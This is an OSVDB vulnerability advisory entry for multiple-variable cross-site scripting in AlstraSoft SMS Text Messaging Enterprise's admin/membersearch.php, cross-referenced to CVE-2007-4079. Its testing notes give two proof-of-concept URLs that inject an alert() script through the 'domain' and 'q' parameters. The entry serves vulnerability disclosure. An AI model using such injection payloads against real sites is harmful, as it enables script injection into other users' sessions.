AlstraSoft SMS Text Messaging Enterprise admin/membersearch.php Multiple Variable XSS

2007-07-22T00:00:00
ID OSVDB:37867
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E http://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit

References:

Related OSVDB ID: 37868 Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html CVE-2007-4079 Bugtraq ID: 25022